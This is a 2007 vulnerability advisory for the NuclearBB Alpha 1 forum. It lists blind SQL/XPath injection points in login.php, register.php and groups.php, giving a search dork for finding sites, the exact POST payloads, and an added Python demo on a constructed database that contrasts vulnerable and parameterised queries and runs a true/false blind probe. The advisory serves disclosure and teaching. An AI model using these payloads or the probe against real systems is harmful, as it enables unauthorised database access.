NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

johnmartinelli.com
Date: Wed Apr 18 2007 - 14:16:26 CDT


NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"

Each parameter listed below reaches a back-end query without escaping. The payloads are shown URL-encoded, so + is a space. For string inputs, xyz"+and+"1"="0 closes the quoted literal and appends a condition that is always false; for numeric inputs, 1+and+1=0 appends the same false condition with no closing quote needed. The injection is blind: the application returns no database error or query output, so it is confirmed by comparing the response to the unmodified request (or to the same payload with "1"="1") against the response to the always-false variant. The quote-and-boolean payload shape is the same for a SQL or an XPath back-end, hence the title.

=============
String Inputs
=============

----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

username=xyzxyz.com
email=xyzxyz.com
pass1=passwordxyz
pass2=passwordxyz
website=xyzxyz.com"+and+"1"="0
location=xyzxyz.com
msn=xyzxyz.com
yahoo=xyzxyz.com
aol=xyzxyz.com
icq=xyzxyz.com
signature=xyzxyz.com
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

username=xyzxyz.com
email=xyzxyz.com
pass1=xyzxyz.com
pass2=xyzxyz.com
website=xyzxyz.com
location=xyzxyz.com
msn=xyzxyz.com
yahoo=xyzxyz.com
aol=xyzxyz.com"+and+"1"="0
icq=xyzxyz.com
signature=xyzxyz.com
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

username=xyzxyz.com
email=xyzxyz.com
pass1=xyzxyz.com
pass2=xyzxyz.com
website=xyzxyz.com
location=xyzxyz.com
msn=xyzxyz.com
yahoo=xyzxyz.com
aol=xyzxyz.com
icq=xyzxyz.com
signature=xyzxyz.com"+and+"1"="0
coppa_state=over
register_submit=Register

==============
Numeric Inputs
==============

-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0

------------------------------
register.php - $_POST['email']
------------------------------

username=xyzxyz.com
email=xyzxyz.com+and+1=0
pass1=xyzxyz.com
pass2=xyzxyz.com
website=xyzxyz.com
location=xyzxyz.com
msn=xyzxyz.com
yahoo=xyzxyz.com
aol=xyzxyz.com
icq=xyzxyz.com
signature=xyzxyz.com
coppa_state=over
register_submit=Register
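The following is an added example, not code from the advisory or from NuclearBB, whose real queries and schema are not shown above. It reproduces the two input classes the advisory tests (a quoted string literal and a bare numeric id) against a constructed in-memory SQLite database, places the vulnerable string-built lookups beside parameterised ones, and runs the same blind true/false differential the advisory relies on. Table and column names (users, groups, website, g) are assumptions chosen to mirror the parameter names above; the payloads use single quotes because SQLite string literals are single-quoted, where the advisory's target quoted with double quotes.

```python
import sqlite3

# Constructed stand-in for a forum database (assumed schema, not NuclearBB's).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, website TEXT)")
    con.execute("CREATE TABLE groups (g INTEGER PRIMARY KEY, name TEXT)")
    con.executemany("INSERT INTO users (username, website) VALUES (?, ?)",
                    [("alice", "alice.example"), ("bob", "bob.example")])
    con.executemany("INSERT INTO groups VALUES (?, ?)", [(1, "admins"), (2, "members")])
    return con

# --- vulnerable lookups: the pattern the advisory's payloads exploit ---

def lookup_website_vulnerable(con, website):
    # String input dropped into a quoted literal with no escaping (register.php
    # 'website' style). A value ending in  ' and '1'='0  closes the literal and
    # appends a false condition, so the row count changes.
    sql = "SELECT COUNT(*) FROM users WHERE website = '%s'" % website
    return con.execute(sql).fetchone()[0]

def lookup_group_vulnerable(con, g):
    # Numeric input interpolated bare (groups.php?g=1+and+1=0 style): no quote
    # is needed, a trailing boolean condition alone alters the WHERE clause.
    sql = "SELECT name FROM groups WHERE g = %s" % g
    row = con.execute(sql).fetchone()
    return row[0] if row else None

# --- hardened lookups: bound parameters, plus a type check for numeric ids ---

def lookup_website_safe(con, website):
    # The driver sends the value as data; quotes inside it never become syntax.
    row = con.execute("SELECT COUNT(*) FROM users WHERE website = ?", (website,)).fetchone()
    return row[0]

def lookup_group_safe(con, g):
    if not str(g).isdigit():          # reject anything that is not a plain integer
        return None
    row = con.execute("SELECT name FROM groups WHERE g = ?", (int(g),)).fetchone()
    return row[0] if row else None

# --- the blind test itself ---

def blind_probe(query_fn, base, true_tail, false_tail):
    """Send the same base value with an always-true and an always-false tail.
    No error text is needed: if the two responses differ, the tail reached
    the query as logic rather than as data."""
    return query_fn(base + true_tail) != query_fn(base + false_tail)

def run_probes():
    """Return {lookup name: injectable?} for each of the four lookups."""
    con = make_db()
    return {
        "website_vulnerable": blind_probe(lambda v: lookup_website_vulnerable(con, v),
                                          "alice.example", "' and '1'='1", "' and '1'='0"),
        "website_safe": blind_probe(lambda v: lookup_website_safe(con, v),
                                    "alice.example", "' and '1'='1", "' and '1'='0"),
        "group_vulnerable": blind_probe(lambda v: lookup_group_vulnerable(con, v),
                                        "1", " and 1=1", " and 1=0"),
        "group_safe": blind_probe(lambda v: lookup_group_safe(con, v),
                                  "1", " and 1=1", " and 1=0"),
    }

if __name__ == "__main__":
    for name, injectable in run_probes().items():
        print("%-18s injectable=%s" % (name, injectable))
```

The probe deliberately compares a true tail with a false tail rather than a payload with the unmodified request, so that a back end that tolerates trailing junk still gives a clean signal. Against a live target the same differential is run on response length or a page marker instead of a row count, and the quote character must match what the application uses, which for the advisory above is the double quote.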

John Martinelli
johnmartinelli.com
http://john-martinelli.com

April 18th, 2007